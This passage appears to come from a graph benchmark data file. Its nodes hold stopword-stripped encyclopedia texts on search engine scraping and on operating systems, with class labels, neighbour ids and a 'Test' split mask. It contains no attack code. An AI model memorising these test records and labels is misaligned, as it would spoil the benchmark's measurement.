    "text": "Search_engine_scraping:search engine scraping search engine scraping process harvesting urls descriptions information search engines google bing yahoo specific form screen scraping web scraping dedicated search engines commonly larger search engine optimization seo providers depend regularly scraping keywords search engines especially google monitor competitive position customers websites relevant keywords indexing status search engines like google allow sort automated access service legal point view known case broken law process entering website extracting data automated fashion also often called crawling search engines like google bing yahoo getting almost data automated crawling bots google far largest search engine users numbers well revenue creative advertisements makes google important search engine scrape seo related companies google take legal action scraping likely self-protective reasons however google using range defensive methods makes scraping results challenging task search engine defense thinks access might automated search engine react differently first layer defense captcha page user prompted verify real person bot tool solving captcha create cookie permits access search engine one day captcha page removed second layer defense similar error page without captcha case user completely blocked using search engine temporary block lifted user changes ip third layer defense longterm block entire network segment google blocked large network blocks months sort block likely triggered administrator happens scraping tool sending high number requests forms detection may also happen normal user especially users sharing ip address network class ipv4 ranges well ipv6 ranges scrape search engine successfully two major factors time amount keywords user needs scrape smaller time job difficult scraping developed scraping script tool needs scraping scripts need overcome technical challenges example open source scraping software makes use mentioned techniques googlescraper framework controls browsers devtools protocol makes hard google detect browser automated developing scraper search engine almost programming language used depending performance requirements languages favorable php commonly used language write scraping scripts websites backend services powerful capabilities built dom parsers libcurl memory usage typical 10 times factor similar c/c++ code ruby rails well python also frequently used automated scraping jobs highest performance c++ dom parsers considered even bash scripting used together curl command line tool scrape search engine developing search engine scraper several existing tools libraries available either used extended analyzed learn scraping websites services legal part often big concern companies web scraping greatly depends country scraping user/company well data website scraped many different court rulings world however comes scraping search engines situation different search engines usually list intellectual property repeat summarize information scraped websites largest public known incident search engine scraped happened 2011 microsoft caught scraping unknown keywords google rather new bing service even incident result court case one possible reason might search engines like google getting almost data scraping millions public reachable websites also without reading accepting terms legal case google microsoft would possibly put whole business risk",
    "neighbors": [
      2945,
      8644,
      8588,
      113,
      10033,
      7965,
      8639
    ],
    "mask": "Test"
  },
  {
    "node_id": 7983,
    "label": 2,
    "text": "Operating_system:operating system operating system os system software manages computer hardware software resources provides common services computer programs time-sharing operating systems schedule tasks efficient use system may also include accounting software cost allocation processor time mass storage printing resources hardware functions input output memory allocation operating system acts intermediary programs computer hardware although application code usually executed directly hardware frequently makes system calls os function interrupted operating systems found many devices contain computer cellular phones video game consoles web servers supercomputers dominant desktop operating system microsoft windows market share around 82.74 macos apple inc. second place 13.23 varieties linux collectively third place 1.57 mobile smartphone tablet combined sector use 2017 70 google android according third quarter 2016 data android smartphones dominant 87.5 percent growth rate 10.3 percent per year followed apple ios 12.1 percent per year decrease market share 5.2 percent operating systems amount 0.3 percent linux distributions dominant server supercomputing sectors specialized classes operating systems embedded real-time systems exist many applications single-tasking system run one program time multi-tasking operating system allows one program running concurrency achieved time-sharing available processor time divided multiple processes processes interrupted repeatedly time slices task-scheduling subsystem operating system multi-tasking may characterized preemptive co-operative types preemptive multitasking operating system slices cpu time dedicates slot programs unix-like operating systems solaris linux—as well non-unix-like amigaos—support preemptive multitasking cooperative multitasking achieved relying process provide time processes defined manner 16-bit versions microsoft windows used cooperative multi-tasking 32-bit versions windows nt win9x used preemptive multi-tasking single-user operating systems facilities distinguish users may allow multiple programs run tandem multi-user operating system extends basic concept multi-tasking facilities identify processes resources disk space belonging multiple users system permits multiple users interact system time time-sharing operating systems schedule tasks efficient use system may also include accounting software cost allocation processor time mass storage printing resources multiple users distributed operating system manages group distinct computers makes appear single computer development networked computers could linked communicate gave rise distributed computing distributed computations carried one machine computers group work cooperation form distributed system os distributed cloud computing context templating refers creating single virtual machine image guest operating system saving tool multiple running virtual machines technique used virtualization cloud computing management common large server warehouses embedded operating systems designed used embedded computer systems designed operate small machines like pdas less autonomy able operate limited number resources compact extremely efficient design windows ce minix 3 examples embedded operating systems real-time operating system operating system guarantees process events data specific moment time real-time operating system may single- multi-tasking multitasking uses specialized scheduling algorithms deterministic nature behavior achieved event-driven system switches tasks based priorities external events time-sharing operating systems switch tasks based clock interrupts library operating system one services typical operating system provides networking provided form libraries composed application configuration code construct unikernel specialized single address space machine image deployed cloud embedded environments early computers built perform series single tasks like calculator basic operating system features developed 1950s resident monitor functions could automatically run different programs succession speed processing operating systems exist modern complex forms early 1960s hardware features added enabled use runtime libraries interrupts parallel processing personal computers became popular 1980s operating systems made similar concept used larger computers 1940s earliest electronic digital systems operating systems electronic systems time programmed rows mechanical switches jumper wires plug boards special-purpose systems example generated ballistics tables military controlled printing payroll checks data punched paper cards programmable general purpose computers invented machine languages consisting strings binary digits 0 1 punched paper tape introduced sped programming process stern 1981 early 1950s computer could execute one program time user sole use computer limited period time would arrive scheduled time program data punched paper cards punched tape program would loaded machine machine would set work program completed crashed programs could generally debugged via front panel using toggle switches panel lights said alan turing master early manchester mark 1 machine already deriving primitive conception operating system principles universal turing machine later machines came libraries programs would linked user program assist operations input output generating computer code human-readable symbolic code genesis modern-day operating system however machines still ran single job time cambridge university england job queue one time washing line clothes line tapes hung different colored clothes-pegs indicate job-priority improvement atlas supervisor introduced manchester atlas commissioned 1962 considered many first recognisable modern operating system brinch hansen described significant breakthrough history operating systems 1950s many major features pioneered field operating systems mainframe computers including batch processing input/output interrupt buffering multitasking spooling runtime libraries link-loading programs sorting records files features included included application software option application programmers rather separate operating system used applications 1959 share operating system released integrated utility ibm 704 later 709 7090 mainframes although quickly supplanted ibsys/ibjob 709 7090 7094 1960s ibm os/360 introduced concept single os spanning entire product line crucial success system/360 machines ibm current mainframe operating systems distant descendants original system applications written os/360 still run modern machines os/360 also pioneered concept operating system keeps track system resources used including program data space allocation main memory file space secondary storage file locking update process terminated reason resources re-claimed operating system alternative cp-67 system s/360-67 started whole line ibm operating systems focused concept virtual machines operating systems used ibm s/360 series mainframes included systems developed ibm cos/360 compatibility operating system dos/360 disk operating system tss/360 time sharing system tos/360 tape operating system bos/360 basic operating system acp airline control program well non-ibm systems mts michigan terminal system music multi-user system interactive computing orvyl stanford timesharing system control data corporation developed scope operating system 1960s batch processing cooperation university minnesota kronos later nos operating systems developed 1970s supported simultaneous batch timesharing use like many commercial timesharing systems interface extension dartmouth basic operating systems one pioneering efforts timesharing programming languages late 1970s control data university illinois developed plato operating system used plasma panel displays long-distance time sharing networks plato remarkably innovative time featuring real-time chat multi-user graphical games 1961 burroughs corporation introduced b5000 mcp master control program operating system b5000 stack machine designed exclusively support high-level languages machine language assembler indeed mcp first os written exclusively high-level language espol dialect algol mcp also introduced many ground-breaking innovations first commercial implementation virtual memory development as/400 ibm made approach burroughs license mcp run as/400 hardware proposal declined burroughs management protect existing hardware production mcp still use today unisys clearpath/mcp line computers univac first commercial computer manufacturer produced series exec operating systems like early main-frame systems batch-oriented system managed magnetic drums disks card readers line printers 1970s univac produced real-time basic rtb system support large-scale time sharing also patterned dartmouth bc system general electric mit developed general electric comprehensive operating supervisor gecos introduced concept ringed security privilege levels acquisition honeywell renamed general comprehensive operating system gcos digital equipment corporation developed many operating systems various computer lines including tops-10 tops-20 time sharing systems 36-bit pdp-10 class systems widespread use unix tops-10 particularly popular system universities early arpanet community rt-11 single-user real-time os pdp-11 class minicomputer rsx-11 corresponding multi-user os late 1960s late 1970s several hardware capabilities evolved allowed similar ported software run one system early systems utilized microprogramming implement features systems order permit different underlying computer architectures appear others series fact 360s 360/40 except 360/165 360/168 microprogrammed implementations enormous investment software systems made since 1960s caused original computer manufacturers continue develop compatible operating systems along hardware notable supported mainframe operating systems include first microcomputers capacity need elaborate operating systems developed mainframes minis minimalistic operating systems developed often loaded rom known monitors one notable early disk operating system cp/m supported many early microcomputers closely imitated microsoft ms-dos became widely popular operating system chosen ibm pc ibm version called ibm dos pc dos 1980s apple computer inc. apple inc. abandoned popular apple ii series microcomputers introduce apple macintosh computer innovative graphical user interface gui mac os introduction intel 80386 cpu chip october 1985 32-bit architecture paging capabilities provided personal computers ability run multitasking operating systems like earlier minicomputers mainframes microsoft responded progress hiring dave cutler developed vms operating system digital equipment corporation would lead development windows nt operating system continues serve basis microsoft operating systems line steve jobs co-founder apple inc. started next computer inc. developed nextstep operating system nextstep would later acquired apple inc. used along code freebsd core mac os x macos latest name change gnu project started activist programmer richard stallman goal creating complete free software replacement proprietary unix operating system project highly successful duplicating functionality various parts unix development gnu hurd kernel proved unproductive 1991 finnish computer science student linus torvalds cooperation volunteers collaborating internet released first version linux kernel soon merged gnu user space components system software form complete operating system since combination two major components usually referred simply linux software industry naming convention stallman free software foundation remain opposed preferring name gnu/linux berkeley software distribution known bsd unix derivative distributed university california berkeley starting 1970s freely distributed ported many minicomputers eventually also gained following use pcs mainly freebsd netbsd openbsd unix originally written assembly language ken thompson wrote b mainly based bcpl based experience multics project b replaced c unix rewritten c developed large complex family inter-related operating systems influential every modern operating system see history unix-like family diverse group operating systems several major sub-categories including system v bsd linux name unix trademark open group licenses use operating system shown conform definitions unix-like commonly used refer large set operating systems resemble original unix unix-like systems run wide variety computer architectures used heavily servers business well workstations academic engineering environments free unix variants linux bsd popular areas four operating systems certified open group holder unix trademark unix hp hp-ux ibm aix descendants original system v unix designed run respective vendor hardware contrast sun microsystems solaris run multiple types hardware including x86 sparc servers pcs apple macos replacement apple earlier non-unix mac os hybrid kernel-based bsd variant derived nextstep mach freebsd unix interoperability sought establishing posix standard posix standard applied operating system although originally created various unix variants subgroup unix family berkeley software distribution family includes freebsd netbsd openbsd operating systems commonly found webservers although also function personal computer os internet owes much existence bsd many protocols commonly used computers connect send receive data network widely implemented refined bsd world wide web also first demonstrated number computers running os based bsd called nextstep 1974 university california berkeley installed first unix system time students staff computer science department began adding new programs make things easier text editors berkeley received new vax computers 1978 unix installed school undergraduates modified unix even order take advantage computer hardware possibilities defense advanced research projects agency us department defense took interest decided fund project many schools corporations government organizations took notice started use berkeley version unix instead official one distributed steve jobs upon leaving apple inc. 1985 formed next inc. company manufactured high-end computers running variation bsd called nextstep one computers used tim berners-lee first webserver create world wide web developers like keith bostic encouraged project replace non-free code originated bell labs done however sued two years legal disputes bsd project spawned number free derivatives netbsd freebsd 1993 openbsd netbsd 1995 macos formerly mac os x later os x line open core graphical operating systems developed marketed sold apple inc. latest pre-loaded currently shipping macintosh computers macos successor original classic mac os apple primary operating system since 1984 unlike predecessor macos unix operating system built technology developed next second half 1980s apple purchased company early 1997 operating system first released 1999 mac os x server 1.0 followed march 2001 client version mac os x v10.0 cheetah since six distinct client server editions macos released two merged os x 10.7 lion prior merging macos server edition macos server architecturally identical desktop counterpart usually ran apple line macintosh server hardware macos server included work group management administration software tools provide simplified access key network services including mail transfer agent samba server ldap server domain name server others mac os x v10.7 lion server aspects mac os x server integrated client version product re-branded os x dropping mac name server tools offered application linux kernel originated 1991 project linus torvalds university student finland posted information project newsgroup computer students programmers received support assistance volunteers succeeded creating complete functional kernel linux unix-like developed without unix code unlike bsd variants open license model linux kernel code available study modification resulted use wide range computing machinery supercomputers smart-watches although estimates suggest linux used 1.82 desktop laptop pcs widely adopted use servers embedded systems cell phones linux superseded unix many platforms used supercomputers including top 385 many computers also green500 different order linux runs top 10 linux also commonly used small energy-efficient computers smartphones smartwatches linux kernel used popular distributions red hat debian ubuntu linux mint google android chrome os chromium os microsoft windows family proprietary operating systems designed microsoft corporation primarily targeted intel architecture based computers estimated 88.9 percent total usage share web connected computers latest version windows 10 2011 windows 7 overtook windows xp common version use microsoft windows first released 1985 operating environment running top ms-dos standard operating system shipped intel architecture personal computers time 1995 windows 95 released used ms-dos bootstrap backwards compatibility win9x could run real-mode ms-dos 16-bit windows 3.x drivers windows released 2000 last version win9x family later versions based windows nt kernel current client versions windows run ia-32 x86-64 32-bit arm microprocessors addition itanium still supported older server version windows server 2008 r2 past windows nt supported additional architectures server editions windows widely used recent years microsoft expended significant capital effort promote use windows server operating system however windows usage servers widespread personal computers windows competes linux bsd server market share reactos windows-alternative operating system developed principles windows without using microsoft code many operating systems significant day longer amigaos os/2 ibm microsoft classic mac os non-unix precursor apple macos beos xts-300 risc os morphos haiku baremetal freemint still used niche markets continue developed minority platforms enthusiast communities specialist applications openvms formerly dec still active development hewlett-packard yet operating systems used almost exclusively academia operating systems education research operating system concepts typical example system fulfills roles minix example singularity used purely research another example oberon system designed eth zürich niklaus wirth jürg gutknecht group students former computer systems institute 1980s used mainly research teaching daily work wirth group operating systems failed win significant market share introduced innovations influenced mainstream operating systems least bell labs plan 9 components operating system exist order make different parts computer work together user software needs go operating system order use hardware whether simple mouse keyboard complex internet component aid firmware device drivers kernel provides basic level control computer hardware devices manages memory access programs ram determines programs get access hardware resources sets resets cpu operating states optimal operation times organizes data long-term non-volatile storage file systems media disks tapes flash memory etc operating system provides interface application program computer hardware application program interact hardware obeying rules procedures programmed operating system operating system also set services simplify development execution application programs executing application program involves creation process operating system kernel assigns memory space resources establishes priority process multi-tasking systems loads program binary code memory initiates execution application program interacts user hardware devices interrupts central operating systems provide efficient way operating system interact react environment alternative operating system watch various sources input events polling require action found older systems small stacks 50 60 bytes unusual modern systems large stacks interrupt-based programming directly supported modern cpus interrupts provide computer way automatically saving local register contexts running specific code response events even basic computers support hardware interrupts allow programmer specify code may run event takes place interrupt received computer hardware automatically suspends whatever program currently running saves status runs computer code previously associated interrupt analogous placing bookmark book response phone call modern operating systems interrupts handled operating system kernel interrupts may come either computer hardware running program hardware device triggers interrupt operating system kernel decides deal event generally running processing code amount code run depends priority interrupt example person usually responds smoke detector alarm answering phone processing hardware interrupts task usually delegated software called device driver may part operating system kernel part another program device drivers may relay information running program various means program may also trigger interrupt operating system program wishes access hardware example may interrupt operating system kernel causes control passed back kernel kernel processes request program wishes additional resources wishes shed resources memory triggers interrupt get kernel attention modern microprocessors cpu mpu support multiple modes operation cpus capability offer least two modes user mode supervisor mode general terms supervisor mode operation allows unrestricted access machine resources including mpu instructions user mode operation sets limits instruction use typically disallows direct access machine resources cpus might modes similar user mode well virtual modes order emulate older processor types 16-bit processors 32-bit one 32-bit processors 64-bit one power-on reset system begins supervisor mode operating system kernel loaded started boundary user mode supervisor mode also known kernel mode established supervisor mode used kernel low level tasks need unrestricted access hardware controlling memory accessed communicating devices disk drives video display devices user mode contrast used almost everything else application programs word processors database managers operate within user mode access machine resources turning control kernel process causes switch supervisor mode typically transfer control kernel achieved executing software interrupt instruction motorola 68000 codice_1 instruction software interrupt causes microprocessor switch user mode supervisor mode begin executing code allows kernel take control user mode programs usually access restricted set microprocessor instructions generally execute instructions could potentially cause disruption system operation supervisor mode instruction execution restrictions typically removed allowing kernel unrestricted access machine resources term user mode resource generally refers one cpu registers contain information running program n't allowed alter attempts alter resources generally causes switch supervisor mode operating system deal illegal operation program attempting example forcibly terminating killing program among things multiprogramming operating system kernel must responsible managing system memory currently use programs ensures program interfere memory already use another program since programs time share program must independent access memory cooperative memory management used many early operating systems assumes programs make voluntary use kernel memory manager exceed allocated memory system memory management almost never seen since programs often contain bugs cause exceed allocated memory program fails may cause memory used one programs affected overwritten malicious programs viruses may purposefully alter another program memory may affect operation operating system cooperative memory management takes one misbehaved program crash system memory protection enables kernel limit process access computer memory various methods memory protection exist including memory segmentation paging methods require level hardware support 80286 mmu n't exist computers segmentation paging certain protected mode registers specify cpu memory address allow running program access attempts access addresses trigger interrupt cause cpu re-enter supervisor mode placing kernel charge called segmentation violation seg-v short since difficult assign meaningful result operation usually sign misbehaving program kernel generally resorts terminating offending program reports error windows versions 3.1 level memory protection programs could easily circumvent need use general protection fault would produced indicating segmentation violation occurred however system would often crash anyway use virtual memory addressing paging segmentation means kernel choose memory program may use given time allowing operating system use memory locations multiple tasks program tries access memory n't current range accessible memory nonetheless allocated kernel interrupted way would program exceed allocated memory see section memory management unix kind interrupt referred page fault kernel detects page fault generally adjusts virtual memory range program triggered granting access memory requested gives kernel discretionary power particular application memory stored even whether actually allocated yet modern operating systems memory accessed less frequently temporarily stored disk media make space available use programs called swapping area memory used multiple programs memory area contains swapped exchanged demand virtual memory provides programmer user perception much larger amount ram computer really multitasking refers running multiple independent computer programs computer giving appearance performing tasks time since computers one two things one time generally done via time-sharing means program uses share computer time execute operating system kernel contains scheduling program determines much time process spends executing order execution control passed programs control passed process kernel allows program access cpu memory later control returned kernel mechanism another program may allowed use cpu so-called passing control kernel applications called context switch early model governed allocation time programs called cooperative multitasking model control passed program kernel may execute long wants explicitly returning control kernel means malicious malfunctioning program may prevent programs using cpu hang entire system enters infinite loop modern operating systems extend concepts application preemption device drivers kernel code operating system preemptive control internal run-times well philosophy governing preemptive multitasking ensuring programs given regular time cpu implies programs must limited much time allowed spend cpu without interrupted accomplish modern operating system kernels make use timed interrupt protected mode timer set kernel triggers return supervisor mode specified time elapsed see sections interrupts dual mode operation many single user operating systems cooperative multitasking perfectly adequate home computers generally run small number well tested programs amigaos exception preemptive multitasking first version windows nt first version microsoft windows enforced preemptive multitasking n't reach home user market windows xp since windows nt targeted professionals access data stored disks central feature operating systems computers store data disks using files structured specific ways order allow faster access higher reliability make better use drive available space specific way files stored disk called file system enables files names attributes also allows stored hierarchy directories folders arranged directory tree early operating systems generally supported single type disk drive one kind file system early file systems limited capacity speed kinds file names directory structures could use limitations often reflected limitations operating systems designed making difficult operating system support one file system many simpler operating systems support limited range options accessing storage systems operating systems like unix linux support technology known virtual file system vfs operating system unix supports wide array storage devices regardless design file systems allowing accessed common application programming interface api makes unnecessary programs knowledge device accessing vfs allows operating system provide programs access unlimited number devices infinite variety file systems installed use specific device drivers file system drivers connected storage device hard drive accessed device driver device driver understands specific language drive able translate language standard language used operating system access disk drives unix language block devices kernel appropriate device driver place access contents disk drive raw format may contain one file systems file system driver used translate commands used access specific file system standard set commands operating system use talk file systems programs deal file systems basis filenames directories/folders contained within hierarchical structure create delete open close files well gather various information including access permissions size free space creation modification dates various differences file systems make supporting file systems difficult allowed characters file names case sensitivity presence various kinds file attributes makes implementation single interface every file system daunting task operating systems tend recommend using support natively file systems specifically designed example ntfs windows ext3 reiserfs linux however practice third party drivers usually available give support widely used file systems general-purpose operating systems example ntfs available linux ntfs-3g ext2/3 reiserfs available windows third-party software support file systems highly varied among modern operating systems although several common file systems almost operating systems include support drivers operating systems vary file system support disk formats may installed windows file system usually limited application certain media example cds must use iso 9660 udf windows vista ntfs file system operating system installed possible install linux onto many types file systems unlike operating systems linux unix allow file system used regardless media stored whether hard drive disc cd dvd ... usb flash drive even contained within file located another file system device driver specific type computer software developed allow interaction hardware devices typically constitutes interface communicating device specific computer bus communications subsystem hardware connected providing commands and/or receiving data device end requisite interfaces operating system software applications specialized hardware-dependent computer program also operating system specific enables another program typically operating system applications software package computer program running operating system kernel interact transparently hardware device usually provides requisite interrupt handling necessary necessary asynchronous time-dependent hardware interfacing needs key design goal device drivers abstraction every model hardware even within class device different newer models also released manufacturers provide reliable better performance newer models often controlled differently computers operating systems expected know control every device future solve problem operating systems essentially dictate every type device controlled function device driver translate operating system mandated function calls device specific calls theory new device controlled new manner function correctly suitable driver available new driver ensures device appears operate usual operating system point view versions windows vista versions linux 2.6 driver execution co-operative meaning driver entered infinite loop would freeze system recent revisions operating systems incorporate kernel preemption kernel interrupts driver give tasks separates process receives response device driver gives tasks currently operating systems support variety networking protocols hardware applications using means computers running dissimilar operating systems participate common network sharing resources computing files printers scanners using either wired wireless connections networks essentially allow computer operating system access resources remote computer support functions could resources connected directly local computer includes everything simple communication using networked file systems even sharing another computer graphics sound hardware network services allow resources computer accessed transparently ssh allows networked users direct access computer command line interface client/server networking allows program computer called client connect via network another computer called server servers offer host various services network computers users services usually provided ports numbered access points beyond server ip address port number usually associated maximum one running program responsible handling requests port daemon user program turn access local hardware resources computer passing requests operating system kernel many operating systems support one vendor-specific open networking protocols well example sna ibm systems decnet systems digital equipment corporation microsoft-specific protocols smb windows specific protocols specific tasks may also supported nfs file access protocols like esound esd easily extended network provide sound local applications remote system sound hardware computer secure depends number technologies working properly modern operating system provides access number resources available software running system external devices like networks via kernel operating system must capable distinguishing requests allowed processed others processed systems may simply distinguish privileged non-privileged systems commonly form requester identity user name establish identity may process authentication often username must quoted username may password methods authentication magnetic cards biometric data might used instead cases especially connections network resources may accessed authentication reading files network share also covered concept requester identity authorization particular services resources accessible requester logged system tied either requester user account variously configured groups users requester belongs addition allow disallow model security system high level security also offers auditing options would allow tracking requests access resources reading file internal security security already running program possible possibly harmful requests must carried interrupts operating system kernel programs directly access hardware resources secured external security involves request outside computer login connected console kind network connection external requests often passed device drivers operating system kernel passed onto applications carried directly security operating systems long concern highly sensitive data held computers commercial military nature united states government department defense dod created trusted computer system evaluation criteria tcsec standard sets basic requirements assessing effectiveness security became vital importance operating system makers tcsec used evaluate classify select trusted operating systems considered processing storage retrieval sensitive classified information network services include offerings file sharing print services email web sites file transfer protocols ftp compromised security front line security hardware devices known firewalls intrusion detection/prevention systems operating system level number software firewalls available well intrusion detection/prevention systems modern operating systems include software firewall enabled default software firewall configured allow deny network traffic service application running operating system therefore one install running insecure service telnet ftp threatened security breach firewall would deny traffic trying connect service port alternative strategy sandbox strategy available systems meet popek goldberg virtualization requirements operating system running user programs native code instead either emulates processor provides host p-code based system java internal security especially relevant multi-user systems allows user system private files users tamper read internal security also vital auditing use since program potentially bypass operating system inclusive bypassing auditing every computer operated individual requires user interface user interface usually referred shell essential human interaction supported user interface views directory structure requests services operating system acquire data input hardware devices keyboard mouse credit card reader requests operating system services display prompts status messages output hardware devices video monitor printer two common forms user interface historically command-line interface computer commands typed line-by-line graphical user interface visual environment commonly wimp present modern computer systems support graphical user interfaces gui often include computer systems original implementation classic mac os gui integrated kernel technically graphical user interface operating system service incorporating support one operating system kernel allow gui responsive reducing number context switches required gui perform output functions operating systems modular separating graphics subsystem kernel operating system 1980s unix vms many others operating systems built way linux macos also built way modern releases microsoft windows windows vista implement graphics subsystem mostly user-space however graphics drawing routines versions windows nt 4.0 windows server 2003 exist mostly kernel space windows 9x little distinction interface kernel many computer operating systems allow user install create user interface desire x window system conjunction gnome kde plasma 5 commonly found setup unix unix-like bsd linux solaris systems number windows shell replacements released microsoft windows offer alternatives included windows shell shell separated windows numerous unix-based guis existed time derived x11 competition among various vendors unix hp ibm sun led much fragmentation though effort standardize 1990s cose cde failed various reasons eventually eclipsed widespread adoption gnome k desktop environment prior free software-based toolkits desktop environments motif prevalent toolkit/desktop combination basis upon cde developed graphical user interfaces evolve time example windows modified user interface almost every time new major version windows released mac os gui changed dramatically introduction mac os x 1999 real-time operating system rtos operating system intended applications fixed deadlines real-time computing applications include small embedded systems automobile engine controllers industrial robots spacecraft industrial control large-scale computing systems early example large-scale real-time operating system transaction processing facility developed american airlines ibm sabre airline reservations system embedded systems fixed deadlines use real-time operating system vxworks pikeos ecos qnx montavista linux rtlinux windows ce real-time operating system shares similar apis desktop windows shares none desktop windows codebase symbian os also rtos kernel eka2 starting version 8.0b embedded systems use operating systems palm os bsd linux although operating systems support real-time computing operating system development one complicated activities computing hobbyist may engage hobby operating system may classified one whose code directly derived existing operating system users active developers cases hobby development support homebrew computing device example simple single-board computer powered 6502 microprocessor development may architecture already widespread use operating system development may come entirely new concepts may commence modeling existing operating system either case hobbyist his/her developer may interact small sometimes unstructured group individuals like interests examples hobby operating system include syllable templeos application software generally written use specific operating system sometimes even specific hardware porting application run another os functionality required application may implemented differently os names functions meaning arguments etc requiring application adapted changed otherwise maintained unix first operating system written assembly language making portable systems different native pdp-11 cost supporting operating systems diversity avoided instead writing applications software platforms java qt abstractions already borne cost adaptation specific operating systems system libraries another approach operating system vendors adopt standards example posix os abstraction layers provide commonalities reduce porting costs",
    "neighbors": [
      2,
      8195,
      7,
      9,
      8204,
      15,
      16,
      8209,
      18,
      19,
      22,
      8214,
      25,
      8217,
      8222,
      8225,
      8226,
      8227,
      8229,
      39,
      8233,
      44,
      45,
      8241,
      8243,
      52,
      8246,
      56,
      8248,
      58,
      61,
      8254,
      8256,
      8258,
      8259,
      69,
      70,
      8262,
      75,
      76,
      83,
      85,
      8278,
      8280,
      89,
      8281,
      93,
      96,
      97,
      8290,
      100,
      8293,
      102,
      8294,
      8295,
      8297,
      8298,
      107,
      8301,
      8303,
      8304,
      8306,
      115,
      8307,
      117,
      118,
      119,
      125,
      129,
      130,
      132,
      136,
      8328,
      8331,
      8333,
      142,
      8336,
      8340,
      8344,
      8351,
      8353,
      165,
      168,
      178,
      186,
      8378,
      8379,
      8380,
      194,
      8386,
      196,
      8388,
      198,
      8389,
      8396,
      205,
      8398,
      8399,
      209,
      8402,
      211,
      213,
      8408,
      8409,
      8410,
      8413,
      8416,
      225,
      8417,
      8418,
      8419,
      8421,
      231,
      8423,
      8424,
      8425,
      236,
      237,
      8429,
      241,
      242,
      8435,
      246,
      8438,
      8439,
      8441,
      251,
      8443,
      8445,
      255,
      256,
      8448,
      259,
      8454,
      8455,
      8460,
      273,
      274,
      8465,
      276,
      8466,
      278,
      8467,
      8469,
      8474,
      8476,
      287,
      8480,
      291,
      292,
      8486,
      295,
      296,
      297,
      8487,
      8489,
      8491,
      303,
      8497,
      8499,
      8502,
      311,
      8503,
      8504,
      8505,
      8509,
      318,
      321,
      8513,
      8515,
      8516,
      8517,
      8520,
      8521,
      8522,
      8524,
      8526,
      8528,
      338,
      341,
      8534,
      345,
      8539,
      348,
      8540,
      8544,
      354,
      8546,
      356,
      8549,
      8551,
      362,
      363,
      8554,
      8557,
      8559,
      370,
      375,
      376,
      8569,
      379,
      8572,
      381,
      8573,
      8576,
      8578,
      8580,
      390,
      8582,
      8584,
      394,
      396,
      8588,
      8592,
      8594,
      406,
      8599,
      8602,
      412,
      413,
      414,
      8606,
      418,
      8611,
      421,
      8614,
      423,
      8616,
      426,
      428,
      8621,
      430,
      8625,
      8627,
      436,
      8630,
      8631,
      440,
      8633,
      446,
      8641,
      8642,
      451,
      8643,
      8644,
      8651,
      461,
      462,
      8654,
      467,
      468,
      8659,
      470,
      8661,
      8662,
      8665,
      477,
      478,
      8671,
      482,
      8675,
      485,
      486,
      487,
      488,
      8677,
      8682,
      8683,
      492,
      8685,
      494,
      8687,
      499,
      8691,
      8697,
      8700,
      8703,
      512,
      515,
      516,
      518,
      8710,
      521,
      8713,
      8715,
      8718,
      8719,
      8721,
      532,
      533,
      8724,
      535,
      8725,
      537,
      8727,
      8728,
      540,
      8729,
      543,
      8740,
      550,
      8742,
      553,
      8745,
      556,
      557,
      559,
      8751,
      561,
      563,
      8760,
      8762,
      573,
      8767,
      576,
      577,
      8770,
      8771,
      580,
      8772,
      8773,
      8774,
      585,
      587,
      589,
      8783,
      593,
      8786,
      595,
      596,
      8791,
      8793,
      602,
      603,
      8794,
      607,
      608,
      8799,
      610,
      8806,
      617,
      8810,
      621,
      622,
      8816,
      8824,
      633,
      634,
      8825,
      636,
      637,
      8827,
      639,
      640,
      641,
      8832,
      8834,
      8841,
      652,
      653,
      8852,
      661,
      8856,
      8857,
      8860,
      671,
      672,
      673,
      8866,
      8867,
      8868,
      677,
      8870,
      8873,
      684,
      8876,
      686,
      687,
      8877,
      689,
      8879,
      8883,
      692,
      694,
      8889,
      699,
      700,
      701,
      8896,
      8897,
      8898,
      708,
      8901,
      8902,
      711,
      712,
      713,
      8904,
      8907,
      716,
      8908,
      722,
      8916,
      8917,
      8918,
      728,
      8922,
      731,
      8924,
      733,
      736,
      737,
      740,
      741,
      8932,
      8937,
      8938,
      747,
      749,
      8941,
      8943,
      757,
      8949,
      8952,
      8954,
      8962,
      8963,
      8965,
      8966,
      8969,
      8970,
      779,
      8971,
      8975,
      784,
      8976,
      8977,
      787,
      788,
      789,
      790,
      8982,
      8985,
      8991,
      8994,
      8995,
      804,
      8997,
      8998,
      807,
      808,
      8999,
      810,
      811,
      9004,
      9006,
      815,
      817,
      9009,
      819,
      9010,
      9014,
      823,
      825,
      9021,
      9022,
      831,
      833,
      9027,
      9033,
      842,
      9035,
      9037,
      847,
      850,
      9046,
      9048,
      862,
      863,
      865,
      868,
      9060,
      9063,
      9064,
      9066,
      875,
      9067,
      9070,
      879,
      9078,
      890,
      9084,
      894,
      9091,
      900,
      9097,
      9105,
      9106,
      915,
      9107,
      9109,
      9112,
      922,
      9115,
      925,
      926,
      9119,
      929,
      9121,
      932,
      9124,
      934,
      935,
      9125,
      9128,
      939,
      9133,
      944,
      947,
      9139,
      9141,
      9144,
      953,
      956,
      9151,
      9152,
      961,
      9153,
      964,
      965,
      969,
      9162,
      974,
      975,
      9166,
      978,
      9171,
      981,
      9173,
      9176,
      9179,
      9180,
      989,
      990,
      9187,
      9189,
      9190,
      9192,
      9194,
      9196,
      1005,
      1006,
      1007,
      9197,
      9204,
      1013,
      9205,
      1018,
      1019,
      9211,
      9212,
      9215,
      9216,
      1025,
      9218,
      9222,
      1031,
      1032,
      1033,
      1034,
      9223,
      9224,
      9227,
      9231,
      1042,
      1043,
      1045,
      1047,
      1049,
      1050,
      9244,
      9245,
      1055,
      9249,
      9251,
      9253,
      1062,
      1064,
      1065,
      9257,
      1069,
      9263,
      1074,
      1078,
      1081,
      9273,
      1083,
      9279,
      9280,
      1089,
      1090,
      9281,
      1100,
      1103,
      1107,
      9299,
      1109,
      1112,
      1113,
      9308,
      9312,
      1122,
      1126,
      9318,
      1128,
      9319,
      9320,
      9323,
      1132,
      9324,
      1134,
      1135,
      1136,
      9327,
      1138,
      9328,
      9329,
      9332,
      9333,
      1143,
      9335,
      1145,
      1147,
      1148,
      1150,
      1151,
      9342,
      9343,
      9345,
      9347,
      9351,
      9355,
      9356,
      1165,
      9358,
      1167,
      1168,
      9360,
      9361,
      1172,
      9366,
      1178,
      9370,
      1181,
      9375,
      9376,
      1185,
      9377,
      1191,
      1193,
      1194,
      9387,
      9388,
      9389,
      1200,
      1202,
      1203,
      9394,
      1207,
      1209,
      1211,
      9403,
      1213,
      9406,
      1215,
      1216,
      9408,
      1219,
      1221,
      1222,
      9418,
      9420,
      1231,
      1232,
      1235,
      1239,
      9431,
      1242,
      9434,
